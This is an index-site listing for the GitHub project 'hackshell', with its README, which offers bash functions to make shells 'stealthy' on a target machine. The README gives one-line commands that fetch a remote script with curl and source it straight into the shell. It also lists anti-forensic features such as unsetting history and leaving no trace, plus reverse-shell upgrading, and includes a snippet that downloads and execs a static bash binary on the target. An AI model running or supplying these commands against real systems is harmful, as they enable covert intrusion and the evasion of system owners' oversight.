Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/hackerschoice/hackshell
Make BASH stealthy and hacker friendly with lots of bash functions
https://github.com/hackerschoice/hackshell
Last synced: 3 days ago
JSON representation
Make BASH stealthy and hacker friendly with lots of bash functions
- Host: GitHub
- URL: https://github.com/hackerschoice/hackshell
- Owner: hackerschoice
- Created: 2024-07-16T15:56:11.000Z (4 months ago)
- Default Branch: main
- Last Pushed: 2024-11-05T09:21:10.000Z (8 days ago)
- Last Synced: 2024-11-05T10:18:23.028Z (8 days ago)
- Language: Shell
- Size: 193 KB
- Stars: 191
- Watchers: 5
- Forks: 21
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# hackshell
Make BASH stealthy and hacker friendly with lots of bash functionsUsage:
```shell
source <(curl -SsfL https://thc.org/hs)
``````shell
source <(curl -SsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)
```Some features:
* unsets HISTFILE, SSH_CONNECT, wget/redis/mysql/less-HISTORY, ...
* Upgrates to PTY shell (if reverse shell)
* Creates hacker-friendly shortcuts, bash-functions and aliases
* Static binary download by simple `bin ` (e.g. `bin nmap`)
* Does not write ANY data to the harddrive
* Leaves no trace
![hackshell](https://github.com/user-attachments/assets/fe4e9f4c-d0f6-4886-8f2f-ef7e3f86b406)It works best with bash. Download BASH if there is no bash on your target:
```shell
URL="https://bin.ajam.dev/$(uname -m)/bash"
[ "$(uname -m)" == i686 ] && URL='https://github.com/polaco1782/linux-static-binaries/raw/refs/heads/master/x86-i686/bash'
curl -obash -SsfL "${URL}" && chmod 700 bash && ./bash --version && exec ./bash -il
```